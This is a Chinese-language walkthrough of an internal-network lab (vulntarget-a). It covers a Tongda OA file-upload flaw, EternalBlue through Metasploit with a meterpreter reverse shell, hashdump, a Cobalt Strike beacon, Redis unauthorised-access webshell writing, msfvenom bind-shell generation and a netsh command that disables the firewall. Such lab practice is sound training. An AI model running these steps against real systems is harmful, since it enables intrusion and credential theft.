前言

在今年的红明谷杯决赛中得知了vulntarget-a靶场(我所打的一个办公OA系统就和他这环境几乎一模一样
而且我在比赛的时候好像是校园网的原因(老背锅侠了),不管我正连反连设置payload等各种操作,这永恒之蓝都打不通,导致跳板机拿不下来后面一系列的操作都干不了……于是我就搭建了它来试试看,同时也发现了自己对后渗透一点都不熟悉(下次要是还有机会打,赛前一定打两个靶场练练手 ?

信息收集

老规矩,内网扫描一波找到目标,并通过nmap或者fscan扫描其端口发现它开着80、135、139、445、3389这些端口

访问目标可以发现是通达OA的一个系统,同时界面显示的年份是2020,说明可能存在一些比较老的nday可以利用

Web渗透

按我比赛时的思路来吧,首先查看一下通达OA的具体版本是11.3

然后通过搜索引擎查找通达OA11.3漏洞进行测试复现发现它是CNVD-2020-26562
通过抓包,改POST包,单包发送,会返回一个数据包,数据包包含了文件上传的路径。我们单包发送会在通达OA系统的文件中生成木马php文件,poc如下:

上传成功后利用文件包含执行上传的木马文件,抓包,构造payload

而在这个靶场的打靶记录中得知有个图形化工具可以一把梭哈

然后成功连上蚁剑,并查看发现内网网段是10.0.20.98(比赛的时候一读flag,web就崩?

内网渗透

从上面nmap扫描可以得知他这应该是win7的系统,所以我们可以尝试一下永恒之蓝攻击(比赛的时候试了无数次乃至重置都打不通

root@kali:~# msfconsole
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v5.0.85-dev                          ]
+ -- --=[ 2002 exploits - 1093 auxiliary - 342 post       ]
+ -- --=[ 560 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View useful productivity tips with the tip command, or view them all with tip -l

msf5 > search ms17-010  # 搜索永恒之蓝

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


msf5 > use 2  # 选择模块2
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.15.142  # 设置靶机IP
rhost => 192.168.15.142
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.15.140  # 设置攻击机IP
lhost => 192.168.15.140
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp  # 选payload
payload => windows/x64/meterpreter/reverse_tcp

反弹shell进去hashdump得到当前用户的hash,解密得到用户密码:win7/admin

进而成功登录远程桌面

横向渗透

这里我们可以利用CS,先创建个后门,然后保存到 /tmp 目录下

接着将其传送上去,并在反弹的shell中去运行 bescon.exe 使其上线CS

再利用CS本身的一款端口扫描器跑一下,找到了另一台存活主机iIP:10.0.20.99

然后我们开始针对新扫描出的IP进行扫描等操作,先设置代理

并将其修改为CS中设置的代理

vim /etc/proxychains.conf

然后扫描一些这台机器的常见端口,发现它的80、6379端口的打开的

Redis未授权

先看看80端口有什么,curl一下可以看到它就只有个Hello World

再扫扫目录看看还有没有啥有用信息

这里我们可以通过3389连到那台win7直接查看,得到web目录:C:/phpStudy/PHPTutorial/WWW

或者直接设置浏览器代理进行访问

接着我们再看看6379服务,也就是针对Redis未授权访问这个漏洞进行攻击

Redis未授权访问引起主要是因为配置不当,导致未授权访问漏洞。进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。
配置不当一般主要是两个原理:
1.配置登录策略导致任意机器都可以登录 redis。
2.未设置密码或者设置弱口令。

直接连接可以成功访问,然后切换目录并写入一句话木马完成getshell

然后对蚁剑设置下代理进行连接

并且发现了10.0.10网段

正向上线msf

先生成正向shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe >shell.exe

然后使用蚁剑上传shell.exe到10.0.20.99,并执行

kali突然出了点问题,换一个接着来配置监听器,但是一直就连不上(防火墙的原因

于是我们去用蚁剑把防火墙关闭一下

netsh firewall set opmode mode=disable

然后重新运行即可上线

好累,不熟悉后渗透,后面接着慢慢练~